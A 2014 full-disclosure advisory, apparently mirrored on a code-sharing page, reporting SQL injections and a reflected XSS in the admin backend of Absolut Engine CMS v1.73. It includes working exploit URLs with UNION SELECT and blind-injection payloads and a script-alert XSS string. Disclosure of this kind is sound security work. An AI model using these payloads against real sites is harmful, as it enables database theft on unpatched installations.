扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 |
Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS Advisory ID: SROEADV-2014-08 Author: Steffen Rösemann Affected Software: CMS Absolut Engine v. 1.73 Vendor URL: http://www.absolutengine.com/ Vendor Status: solved CVE-ID: - ========================== Vulnerability Description: ========================== The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL injection vulnerabilities and a XSS vulnerability in its administrative backend. ================== Technical Details: ================== The following PHP-Scripts are prone to SQL injections: *managersection.php (via sectionID parameter):* *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1* *Exploit Example:* *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+* *edituser.php (via userID parameter):* *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3* *Exploit Example:* *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+* *admin.php (via username parameter, BlindSQLInjection):* *http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* *Exploit Example:* *http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* *managerrelated.php (via title parameter):* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title <http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}* *Exploit Example:* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+* The last PHP-Script is as well vulnerable to a Reflecting XSS vulnerability. *Exploit Example:* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E* Although this is a product which is not actively developed anymore, I think it is worth mentioning as the idea (of the lists) are to keep tracking (unknown) vulnerabilities in software products (but that is a personally point of view). Moreover, this product is still in use by some sites (!) and it is offered without a hint of its status. ========= Solution: ========= As the CMS is not actively developed, it shouldn't be used anymore. ==================== Disclosure Timeline: ==================== 29-Dec-2014 – found the vulnerability 29-Dec-2014 - informed the developers 29-Dec-2014 – release date of this security advisory [without technical details] 30-Dec-2014 – Vendor responded, won't patch vulnerabilities 30-Dec-2014 – release date of this security advisory 30-Dec-2014 – post on FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== http://www.absolutengine.com/ http://sroesemann.blogspot.de |
体验盒子
